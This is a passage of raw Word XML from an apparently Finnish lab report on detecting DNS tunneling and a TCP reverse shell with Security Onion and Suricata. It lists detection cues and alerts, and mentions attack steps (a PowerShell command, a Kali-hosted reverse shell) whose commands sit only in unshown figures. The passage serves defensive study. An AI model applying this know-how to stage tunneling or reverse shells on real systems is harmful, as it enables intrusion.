        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="0C78939E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Liikenteen analysointi:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="03B4902E" w14:textId="640F9446">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>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Tutkitaan DNS-liikennettä:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="430A7FBD" w14:textId="663C14FA">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>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Domainit, mihin yleensä lähetetään liikennettä, ja mihin ei.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="17324EF5" w14:textId="4D36B16C">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>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DNS-liikenteen jatkuvuus tiettyyn Domainiin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="593AF1BC" w14:textId="64C6B1E6">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>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Useiden kyselyjen samankaltaisuus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="3C6D7264" w14:textId="7169EA06">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="480" w:afterAutospacing="off" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="0C78939E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="573154D7" w14:textId="64B8A83E">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="0C78939E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Paketin analyysi:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="693941D3" w14:textId="7E27642F">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>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Tarkastetaan yksittäisten DNS-pakettien sisältöä:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="49A8B931" w14:textId="2B788DF0">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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Epätavallisen pitkät kyselyt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="0EB55396" w14:textId="135052B1">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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Salatun datan tai base64- käyttö.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="0D4188CD" w14:textId="78B1C65B">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="480" w:afterAutospacing="off" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="0C78939E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="581622A5" w14:textId="0EF5A1CD">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="0C78939E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Tilastollinen tarkastelu:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="0743C225" w14:textId="575EEE87">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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Tarkastellaan domain-nimiä, ja niiden rakennetta:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="7DC3D942" w14:textId="52D90850">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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Epätavallisia merkkejä paljon nimissä.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="46CD3022" w14:textId="44C43813">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="0C78939E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Paljon numeroita tietueissa, yleensä salatut sisältävät paljon numeroita.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C78939E" w:rsidP="261F289F" w:rsidRDefault="0C78939E" w14:paraId="0BDA15DF" w14:textId="52AD4A77">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="480" w:afterAutospacing="off" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="0C78939E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">(DNS </w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="0C78939E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Tunneling</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="0C78939E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="0C78939E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Detecting</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="0C78939E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="0C78939E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Tunneling</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="0C78939E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="0C78939E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="261F289F" w:rsidR="0C78939E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>. 2023.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008208AF" w:rsidP="00CB022F" w:rsidRDefault="002209AB" w14:paraId="3AB2FED5" w14:textId="6B2885FD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00BD2771">
        <w:t xml:space="preserve">uoritetaan </w:t>
      </w:r>
      <w:r>
        <w:t>PowerShellilla</w:t>
      </w:r>
      <w:r w:rsidR="00BD2771">
        <w:t xml:space="preserve"> kohdekoneella </w:t>
      </w:r>
      <w:r w:rsidR="001771CE">
        <w:t xml:space="preserve">kuvion 9 </w:t>
      </w:r>
      <w:r w:rsidR="00BD2771">
        <w:t>komento</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0453" w:rsidP="008C0453" w:rsidRDefault="006C3882" w14:paraId="79D7AB97" w14:textId="7E133AFC">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54B1DA78" wp14:editId="4F5504AB">
            <wp:extent cx="6120130" cy="1118870"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="2091344248" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, ohjelmisto, Font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23">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1118870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000D4C91" w:rsidR="006C3882" w:rsidP="633E8A95" w:rsidRDefault="008C0453" w14:paraId="0F7C29E7" w14:textId="13BA3FA6">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971526" w:id="40"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="002209AB">
        <w:t>PowerShell-komento</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w:rsidR="006C3882" w:rsidP="00CB022F" w:rsidRDefault="006C3882" w14:paraId="1136FD74" w14:textId="04E1E48F">
      <w:r w:rsidR="089A619D">
        <w:rPr/>
        <w:t>Tästä aiheutuu hälyty</w:t>
      </w:r>
      <w:r w:rsidR="55757FCE">
        <w:rPr/>
        <w:t xml:space="preserve">ksiä </w:t>
      </w:r>
      <w:r w:rsidR="1E3474A5">
        <w:rPr/>
        <w:t xml:space="preserve">Security </w:t>
      </w:r>
      <w:r w:rsidR="1E3474A5">
        <w:rPr/>
        <w:t>Onioniin</w:t>
      </w:r>
      <w:r w:rsidR="089A619D">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0012165B">
        <w:rPr/>
        <w:t xml:space="preserve">mahdollisesta </w:t>
      </w:r>
      <w:r w:rsidR="5F877200">
        <w:rPr/>
        <w:t xml:space="preserve">toksisesta </w:t>
      </w:r>
      <w:r w:rsidR="1E3474A5">
        <w:rPr/>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidR="5F877200">
        <w:rPr/>
        <w:t xml:space="preserve"> liikenteestä</w:t>
      </w:r>
      <w:r w:rsidR="001771CE">
        <w:rPr/>
        <w:t xml:space="preserve"> (Kuvio 10)</w:t>
      </w:r>
      <w:r w:rsidR="00172236">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="5360F102">
        <w:rPr/>
        <w:t xml:space="preserve"> Tässä </w:t>
      </w:r>
      <w:r w:rsidR="5360F102">
        <w:rPr/>
        <w:t>suricata</w:t>
      </w:r>
      <w:r w:rsidR="5360F102">
        <w:rPr/>
        <w:t xml:space="preserve"> on huomannut ainakin kummalliseen </w:t>
      </w:r>
      <w:r w:rsidR="5360F102">
        <w:rPr/>
        <w:t>Domainiin</w:t>
      </w:r>
      <w:r w:rsidR="5360F102">
        <w:rPr/>
        <w:t xml:space="preserve"> menevät DNS-kyselyt, jotka voisivat viitata tunnelointiin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0453" w:rsidP="008C0453" w:rsidRDefault="008C0453" w14:paraId="060C1CEF" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="008C0453">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E7B919F" wp14:editId="5FCCCD53">
            <wp:extent cx="6120130" cy="468630"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="27912281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2814" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="468630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00965A8C" w:rsidR="00965A8C" w:rsidP="00965A8C" w:rsidRDefault="008C0453" w14:paraId="770CDC87" w14:textId="36E9BCAD">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971527" w:id="41"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00B734BD">
        <w:t>Hälytys DNS liikenteestä</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w:rsidR="008C0453" w:rsidP="008F0EE6" w:rsidRDefault="00965A8C" w14:paraId="0D29B713" w14:textId="5683C9F4">
      <w:pPr>
        <w:pStyle w:val="Otsikko3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc660083900" w:id="2034617478"/>
      <w:r w:rsidR="00965A8C">
        <w:rPr/>
        <w:t>TCP reverse shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2034617478"/>
    </w:p>
    <w:p w:rsidR="00965A8C" w:rsidP="00965A8C" w:rsidRDefault="00E56D9D" w14:paraId="05080CB1" w14:textId="420E6B19">
      <w:r w:rsidR="67ACA984">
        <w:rPr/>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="10FF4745">
        <w:rPr/>
        <w:t xml:space="preserve">uodaan </w:t>
      </w:r>
      <w:r w:rsidR="10FF4745">
        <w:rPr/>
        <w:t>reverse</w:t>
      </w:r>
      <w:r w:rsidR="10FF4745">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="10FF4745">
        <w:rPr/>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="10FF4745">
        <w:rPr/>
        <w:t xml:space="preserve"> yhteys ns1 palv</w:t>
      </w:r>
      <w:r w:rsidR="10FF4745">
        <w:rPr/>
        <w:t xml:space="preserve">elimelle kali </w:t>
      </w:r>
      <w:r w:rsidR="10FF4745">
        <w:rPr/>
        <w:t>linuxilla</w:t>
      </w:r>
      <w:r w:rsidR="10FF4745">
        <w:rPr/>
        <w:t xml:space="preserve"> kuvion 11 mukaan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="258C080C" w:rsidP="261F289F" w:rsidRDefault="258C080C" w14:paraId="38530990" w14:textId="20A0EB7B">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="480" w:afterAutospacing="off" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="258C080C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Miten Reverse Shell voidaan havaita:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="258C080C" w:rsidP="261F289F" w:rsidRDefault="258C080C" w14:paraId="2E257D31" w14:textId="19D4EBE9">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="258C080C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Lokien ja verkkoliikenteen analyysi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="258C080C" w:rsidP="261F289F" w:rsidRDefault="258C080C" w14:paraId="337CAEE7" w14:textId="7FA03886">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="258C080C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Seurataan poikkeavaa sisään- ja ulosmenevää liikennettä, kuten yhteyksiä tuntemattomiin IP-osoitteisiin tai epätavallisille porteille.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="258C080C" w:rsidP="261F289F" w:rsidRDefault="258C080C" w14:paraId="244A98FB" w14:textId="7CD1F6BC">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="258C080C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Tarkkaillaan liikennettä, jossa kohde yrittää yhdistyä hyökkääjän koneelle, josta komennot tulevat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="258C080C" w:rsidP="261F289F" w:rsidRDefault="258C080C" w14:paraId="01C911FB" w14:textId="4DF695CB">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="258C080C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Intrusion Detection Systems (IDS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="258C080C" w:rsidP="261F289F" w:rsidRDefault="258C080C" w14:paraId="43244ADF" w14:textId="5BB27005">
      <w:pPr>
